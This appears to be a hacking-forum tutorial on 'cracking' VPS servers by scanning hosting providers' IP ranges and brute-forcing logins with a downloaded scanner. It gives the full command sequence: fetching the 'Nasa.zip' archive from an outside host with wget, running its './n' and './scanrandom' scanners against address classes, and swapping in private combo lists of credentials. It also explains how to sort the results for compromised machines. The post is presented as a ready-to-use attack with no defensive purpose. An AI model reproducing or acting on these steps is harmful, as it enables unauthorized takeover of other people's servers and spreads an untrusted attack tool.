Guide in cracking vps / getting vps for free!

FSBOT

I am Bot
Administrator
VIDEO TUTORIAL : https://mega.nz/#!ioUU1CxI!15XpsZy6HR2F5ufIB0ouK6lQm7hKg6kTAmDqEqoOmHA

0_0 ~~~~VPS SCANNING TUTORIAL~~~~ 0_0
So hi guys i was asked by many people to do this tutorial on how to get free vps
1f600.png
.
I think we should start:
Ok first of all we will need "a scanner" (a scanner is basically a vps that scans all ips on a class (example 45.55) and after it will try combinations of usernames and passwords on them).
I would recommand to buy one from someone or me (not buying from vps hosting sites because it will get 99% suspended)
After we got a vps we can start the cracking session!
Now we need to download the scanner script (archive) that we will use!
Code:
Code:
wget arhivedavid.000webhostapp.com/Nasa.zip
Ok now we will extract the script (archive)
Code:
Code:
unzip Nasa.zip
Now we cd into the folder
Code:
Code:
cd Nasa
Now we want to give permission to the files
Code:
Code:
chmod +x *
No we are ready to start the VPS Scanning process
Let's say we want to scan digitalocean or amazon for example so we will google digitalocean ipinfo and take a class from here (for example 103.253)
ErO9ck7.png

Ok now let's get to the scanning part , we will want to write this
Code:
Code:
./n 103.254
Now we are basically done and just need to wait until the process of scanning is over.
If you close the vps while scanning it will cancel the scanning process but we can avoid that by using screen (for more info about that https://kb.iu.edu/d/acuy)
What is the command to open the screen?
Code:
Code:
screen -R scan
How we can exit the screen?
Code:
Code:
Ctrl+A+D
If you have a vps that don't have screen installed and doesn't have acces to sudo command to install the screen you can just let the vps on a rdp or on pc open until it's done.
If you have a vps that have sudo but doesn't have screen installed use this command
Code:
Code:
sudo apt-get install screen  OR  sudo yum install screen
Now let's talk about the random scan which i recommand to be used for 1-2 days and after we can stop the vps scanning process and check what we got and then start it again!
How to use it?
Code:
Code:
./scanrandom
And basically it will scan random classes until we stop it!
*I need to metion that getting a private combo list (passfile) and use it ,it will increase the chance of getting more vps!
*If you want to change it just remove the file "1" and just replace it with your own and rename it to "1"*
Ok now let's say we are done with the scan process and we want to see what we got.
We want to download the file port to our computer from the vps and after that enter this command in vps (ONLY AFTER WE DOWNLOADED THE PORT FILE TO OUR COMPUTER)
Code:
Code:
./clean
That will clean all files for us and we can start a new vps scanning process using the ./n command or ./scanrandom .
Now we want to open with Notepad++ the port file which contains what we got if we got something!
[image] It will look very messy containing a lot of sh*tty vps (honeypots or internet routers)
So we want to sort it!
We want to take the first 3 numbers from the ip and replace them with just a blank space
[image] If you replace a ip and it will only replace 1 that means you got something and just press ctrl+z to get the ip back and try to login to see if it's a good vps or a sh*tty vps.
After doing this with all what we got it will look something like that:
https://gyazo.com/0df3cc3f528209f20348035b62b98bf4
So we got 4 routers so we are not lucky and didn't get anything!

Ok so that's all guys hope you enjoyed the tutorial and please like and rate 5 stars the post and comment down if you want a video tutorial too!
Video link : https://mega.nz/#!ioUU1CxI!15XpsZy6HR2F5ufIB0ouK6lQm7hKg6kTAmDqEqoOmHA
Credit to : ShadowStrike and NasaPaul (for the archive)

Thanks for the attention good luck with scanning!